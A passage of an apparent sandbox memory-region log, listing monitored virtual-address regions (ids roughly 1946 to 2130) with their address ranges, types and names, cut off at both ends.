1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1946 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1947 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1948 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1949 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1950 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1951 start_va = 0x64e0000 end_va = 0x64e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064e0000" filename = "" Region: id = 1952 start_va = 0x64f0000 end_va = 0x64f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064f0000" filename = "" Region: id = 1953 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1954 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1955 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1956 start_va = 0x7320000 end_va = 0x735ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007320000" filename = "" Region: id = 1957 start_va = 0x7360000 end_va = 0x739ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007360000" filename = "" Region: id = 1958 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1959 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1960 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1961 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1962 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1963 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1964 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1965 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1966 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1967 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1968 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1969 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1970 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1971 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1972 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1973 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1974 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1975 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1976 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1977 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1978 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1979 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1980 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1981 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1982 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1983 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1984 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1985 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1986 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1987 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1988 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1989 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1990 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1991 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1992 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1993 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1994 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1995 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1996 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1997 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1998 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1999 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 2000 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 2001 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 2002 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 2003 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 2004 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 2005 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 2006 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 2007 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 2008 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 2009 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 2010 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 2011 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 2012 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 2013 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 2014 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 2015 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 2016 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 2017 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 2018 start_va = 0x73a0000 end_va = 0x73dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000073a0000" filename = "" Region: id = 2019 start_va = 0x73e0000 end_va = 0x741ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000073e0000" filename = "" Region: id = 2020 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 2021 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 2022 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 2023 start_va = 0x6010000 end_va = 0x601ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 2024 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2025 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2026 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2027 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 2028 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2029 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2030 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2031 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 2032 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2033 start_va = 0x7420000 end_va = 0x745ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007420000" filename = "" Region: id = 2034 start_va = 0x7460000 end_va = 0x749ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007460000" filename = "" Region: id = 2035 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2036 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2037 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 2038 start_va = 0x64e0000 end_va = 0x64f6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2039 start_va = 0x64e0000 end_va = 0x64f6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2040 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2041 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 2042 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2043 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 2044 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2045 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 2046 start_va = 0x64e0000 end_va = 0x64f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2047 start_va = 0x64e0000 end_va = 0x64f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2048 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2049 start_va = 0x6660000 end_va = 0x6b51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 2050 start_va = 0x72a0000 end_va = 0x7795fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072a0000" filename = "" Region: id = 2051 start_va = 0x77a0000 end_va = 0x77dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000077a0000" filename = "" Region: id = 2052 start_va = 0x77e0000 end_va = 0x781ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000077e0000" filename = "" Region: id = 2053 start_va = 0x7820000 end_va = 0x7d1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007820000" filename = "" Region: id = 2054 start_va = 0x6b60000 end_va = 0x6c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b60000" filename = "" Region: id = 2055 start_va = 0x6c60000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c60000" filename = "" Region: id = 2056 start_va = 0x7d20000 end_va = 0x811ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d20000" filename = "" Region: id = 2057 start_va = 0x7120000 end_va = 0x71acfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007120000" filename = "" Region: id = 2058 start_va = 0x8120000 end_va = 0x81a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008120000" filename = "" Region: id = 2059 start_va = 0x7120000 end_va = 0x71b4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007120000" filename = "" Region: id = 2060 start_va = 0x8120000 end_va = 0x81b5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008120000" filename = "" Region: id = 2061 start_va = 0x7120000 end_va = 0x71bbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007120000" filename = "" Region: id = 2062 start_va = 0x8120000 end_va = 0x81befff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008120000" filename = "" Region: id = 2063 start_va = 0x7120000 end_va = 0x71bcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007120000" filename = "" Region: id = 2064 start_va = 0x8120000 end_va = 0x81c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008120000" filename = "" Region: id = 2065 start_va = 0x7120000 end_va = 0x71d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007120000" filename = "" Region: id = 2066 start_va = 0x8120000 end_va = 0x81d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008120000" filename = "" Region: id = 2067 start_va = 0x7120000 end_va = 0x71d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007120000" filename = "" Region: id = 2068 start_va = 0x8120000 end_va = 0x815ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008120000" filename = "" Region: id = 2069 start_va = 0x8160000 end_va = 0x819ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008160000" filename = "" Region: id = 2070 start_va = 0x64e0000 end_va = 0x64effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064e0000" filename = "" Region: id = 2071 start_va = 0x81a0000 end_va = 0x81dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000081a0000" filename = "" Region: id = 2072 start_va = 0x81e0000 end_va = 0x821ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000081e0000" filename = "" Region: id = 2073 start_va = 0x64e0000 end_va = 0x64fbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064e0000" filename = "" Region: id = 2074 start_va = 0x6500000 end_va = 0x650dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006500000" filename = "" Region: id = 2075 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2076 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2077 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2078 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2079 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2080 start_va = 0x8220000 end_va = 0x825ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008220000" filename = "" Region: id = 2081 start_va = 0x8260000 end_va = 0x829ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008260000" filename = "" Region: id = 2082 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2083 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2084 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2085 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2086 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2087 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2088 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2089 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2090 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2091 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2092 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2093 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2094 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2095 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2096 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2097 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2098 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2099 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2100 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2101 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2102 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2103 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2104 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2105 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2106 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2107 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2108 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2109 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2110 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2111 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2112 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2113 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2114 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2115 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2116 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2117 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2118 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2119 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2120 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2121 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2122 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2123 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2124 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2125 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2126 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2127 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2128 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2129 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2130 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 